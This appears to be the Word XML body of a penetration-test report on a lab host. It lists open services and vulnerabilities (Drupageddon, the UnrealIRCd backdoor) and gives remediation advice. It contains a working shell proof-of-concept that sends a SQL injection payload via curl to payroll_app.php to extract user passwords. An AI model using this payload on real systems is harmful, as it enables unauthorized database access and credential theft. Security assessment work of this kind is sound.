      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AACFC66" w14:textId="0328830B" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:r>
        <w:t>Nmap scripts found the following shares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C062FE" w14:textId="0A5F2CB6" w:rsidR="00BD55B3" w:rsidRDefault="00F6289A" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00BD55B3" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.25.100.24\IPC$</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0042F8E5" w14:textId="3A092215" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IPC service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D610A" w14:textId="747A82CA" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B228A45" w14:textId="2E061BF2" w:rsidR="00BD55B3" w:rsidRDefault="00F6289A" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00BD55B3" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.25.100.24\print$</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B6AD933" w14:textId="1C32871A" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975A5B8" w14:textId="5B213D61" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/var/lib/samba/printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC26497" w14:textId="54F6D843" w:rsidR="00BD55B3" w:rsidRDefault="00F6289A" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00BD55B3" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.25.100.24\public</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F0D1899" w14:textId="616F9C12" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C339F4" w14:textId="1B3FAB6F" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC5E98" w14:textId="77777777" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc49875729"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 3306</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="346168C8" w14:textId="4E0E9375" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, cannot be connected to remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203BC260" w14:textId="18DFDD75" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc49875730"/>
      <w:r>
        <w:t>Port 6667 &amp; 6697</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="680DEAE4" w14:textId="78F92CCD" w:rsidR="00137370" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:r>
        <w:t xml:space="preserve">This port is running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server version 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED7659" w14:textId="6A680A90" w:rsidR="00137370" w:rsidRPr="00BA2A73" w:rsidRDefault="00F6289A" w:rsidP="00BA2A73">
      <w:hyperlink w:anchor="_Port_6667_&amp;" w:history="1">
        <w:r w:rsidR="00137370" w:rsidRPr="00137370">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Vulnerabilities section</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B4D2F81" w14:textId="15CD5626" w:rsidR="00137370" w:rsidRDefault="00137370" w:rsidP="00137370">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc49875731"/>
      <w:r>
        <w:t>Port 8080</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="016EADB3" w14:textId="15D22091" w:rsidR="00137370" w:rsidRDefault="00137370" w:rsidP="00137370">
      <w:r>
        <w:t>This port is running Jetty 8.1.7</w:t>
      </w:r>
      <w:r w:rsidR="005C20DD">
        <w:t xml:space="preserve"> and Apache Continuum</w:t>
      </w:r>
      <w:r w:rsidR="000010C0">
        <w:t xml:space="preserve"> 1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E8D92" w14:textId="1EA4F2B4" w:rsidR="00B26267" w:rsidRDefault="00F6289A" w:rsidP="00137370">
      <w:hyperlink w:anchor="_Port_8080" w:history="1">
        <w:r w:rsidR="00B26267" w:rsidRPr="000010C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Vulnerabilities section</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5396A723" w14:textId="54F67C36" w:rsidR="00E34EA3" w:rsidRDefault="00E34EA3" w:rsidP="00E34EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc49875732"/>
      <w:r>
        <w:t>Port 8181</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0F080F82" w14:textId="16879CA0" w:rsidR="00E34EA3" w:rsidRDefault="00E34EA3" w:rsidP="00E34EA3">
      <w:r>
        <w:t xml:space="preserve">This port is running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WEBrick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> httpd 1.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B906330" w14:textId="77777777" w:rsidR="00993E3E" w:rsidRPr="00E34EA3" w:rsidRDefault="00993E3E" w:rsidP="00E34EA3"/>
    <w:p w14:paraId="3470A84A" w14:textId="2034F950" w:rsidR="00D43835" w:rsidRDefault="00D43835" w:rsidP="00BA2A73">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B65337" w14:textId="10866270" w:rsidR="006B333A" w:rsidRDefault="00CB19DD" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc49374296"/>
      <w:bookmarkStart w:id="19" w:name="_Toc49875733"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="0E7B0FDF" w14:textId="2201A134" w:rsidR="00EC79C0" w:rsidRPr="00EC79C0" w:rsidRDefault="00EC79C0" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Port_80"/>
      <w:bookmarkStart w:id="21" w:name="_Toc49875734"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:t>Port 80</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="5784EEC3" w14:textId="55909EE9" w:rsidR="00F2489E" w:rsidRDefault="00E6595B" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc49374297"/>
      <w:bookmarkStart w:id="23" w:name="_Toc49875735"/>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00233020">
        <w:t>rupal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2E860969" w14:textId="4D580389" w:rsidR="00233020" w:rsidRDefault="00023819" w:rsidP="00233020">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Core versions 7.x &lt; 7.32 are vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2014-3704</w:t>
        </w:r>
        <w:r w:rsidR="00241C3C" w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> SQL Injection “</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00241C3C" w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Drupageddon</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00241C3C" w:rsidRPr="00241C3C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>”</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="448C9010" w14:textId="151DE17A" w:rsidR="00AF5782" w:rsidRDefault="00AF5782" w:rsidP="00233020">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00AF5782">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is available for this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FCFCD" w14:textId="039BAE88" w:rsidR="00A02963" w:rsidRDefault="00A02963" w:rsidP="00233020">
      <w:r>
        <w:t>MSF exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DAA262" w14:textId="77777777" w:rsidR="00DC6720" w:rsidRDefault="004C49C2" w:rsidP="00233020">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BB2EF8C" wp14:editId="510F96EC">
            <wp:extent cx="5795284" cy="3665551"/>
            <wp:effectExtent l="0" t="0" r="0" b="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ell phone&#10;&#10;Description automatically generated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2865" cy="3910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F30E" w14:textId="77777777" w:rsidR="00DC6720" w:rsidRDefault="00DC6720" w:rsidP="00233020">
      <w:r>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B7604" w14:textId="43AF69B7" w:rsidR="00624BEE" w:rsidRDefault="00DC6720" w:rsidP="00233020">
      <w:r>
        <w:t xml:space="preserve">Update </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the latest stable version available.</w:t>
      </w:r>
      <w:r w:rsidR="00624BEE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00131569" w14:textId="0F54AA4F" w:rsidR="00233020" w:rsidRDefault="007451F9" w:rsidP="00EC79C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Payrollapp"/>
      <w:bookmarkStart w:id="25" w:name="_Toc49374298"/>
      <w:bookmarkStart w:id="26" w:name="_Toc49875736"/>
      <w:bookmarkEnd w:id="24"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payrollapp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E165D5F" w14:textId="5F767127" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payrollapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is vulnerable to an SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFCC7E" w14:textId="4036D18A" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:r>
        <w:t xml:space="preserve">Manual </w:t>
      </w:r>
      <w:r w:rsidR="00A02963">
        <w:t>SQLI in browser</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F15814" w14:textId="181E5DB3" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6343391A" wp14:editId="2FA3AF00">
            <wp:extent cx="5727700" cy="3726241"/>
            <wp:effectExtent l="0" t="0" r="6350" b="7620"/>
            <wp:docPr id="3" name="Picture 3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ell phone&#10;&#10;Description automatically generated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2999" cy="376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D5353" w14:textId="44FA753A" w:rsidR="00BB143D" w:rsidRDefault="00BB143D" w:rsidP="00BB143D">
      <w:r>
        <w:t>POC script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2BCB2E" w14:textId="77777777" w:rsidR="00C4296D" w:rsidRDefault="00094A90" w:rsidP="00BB143D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73BD6781" wp14:editId="00F4E8E3">
            <wp:extent cx="5727763" cy="3061252"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="4" name="Picture 4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ell phone&#10;&#10;Description automatically generated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8109" cy="3130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11B4D" w14:textId="77777777" w:rsidR="00C4296D" w:rsidRDefault="00C4296D" w:rsidP="00BB143D">
      <w:r>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57701CFE" w14:textId="6C18CB8E" w:rsidR="00094A90" w:rsidRDefault="00C4296D" w:rsidP="00BB143D">
      <w:r>
        <w:t xml:space="preserve">Force each user to change their password and disable any instances of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payroll_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> until the SQL injection is patched.</w:t>
      </w:r>
      <w:r w:rsidR="00094A90">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65D65B" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRDefault="00BB143D" w:rsidP="00A87C88">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8D50B" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41CCDE" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D35E1" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t># Author: Mason Soroka-Gill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8D709" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E51C8" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t># This script can be used to make unauthorized queries to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E43382" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve"># database behind any unpatched instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>payroll_app.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D98D180" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA9FC15" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763890A3" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>if [ $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t># !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>= 1 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311A357" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "Usage:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B430A1" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "$0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>target_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA32E1" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "Example:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073EC9E4" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    echo "$0 http://10.25.100.24/payroll_app.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3F5BD" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve">    exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74871931" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE5C37" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5684AE14" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B171819" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000440F7" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A61FAB" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>curl -X POST $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t xml:space="preserve"> --data "user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>nobody&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61FAB">
        <w:t>=a'; select password from users where username='' OR ''='&amp;s=OK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EACC1D" w14:textId="77777777" w:rsidR="00A87C88" w:rsidRPr="00A87C88" w:rsidRDefault="00A87C88" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA64E74" w14:textId="13DD1E94" w:rsidR="006254C6" w:rsidRDefault="006254C6" w:rsidP="00A87C88">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="248CCA8E" w14:textId="72E19D87" w:rsidR="00D66EEA" w:rsidRDefault="006E5841" w:rsidP="006E5841">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Port_6667_&amp;"/>
      <w:bookmarkStart w:id="28" w:name="_Toc49875737"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 6667 &amp; 6697</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="60DB6C06" w14:textId="5CCBFE1E" w:rsidR="009D5A42" w:rsidRDefault="0052608E" w:rsidP="0052608E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnrealIRC</w:t>
      </w:r>
      <w:r w:rsidR="009D5A42">
        <w:t>D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D5A42">
        <w:t xml:space="preserve"> version 3.2.8.1 is vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="009D5A42" w:rsidRPr="009D5A42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2010-2075 Malicious Backdoor Arbitrary Command Execution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D5A42">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F34D4EE" w14:textId="3701008A" w:rsidR="0052608E" w:rsidRDefault="0052608E" w:rsidP="0052608E">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="0052608E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is available for this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E7F5B" w14:textId="1EE91C5E" w:rsidR="004A3F68" w:rsidRDefault="004A3F68" w:rsidP="0052608E">
      <w:r>
        <w:t>Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672C854" w14:textId="6B6719D0" w:rsidR="003437D2" w:rsidRDefault="003437D2" w:rsidP="0052608E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3269E906" wp14:editId="58007566">
            <wp:extent cx="5731510" cy="608076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8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38CD5" w14:textId="0933373A" w:rsidR="0027091D" w:rsidRDefault="0027091D" w:rsidP="0052608E">
      <w:r>
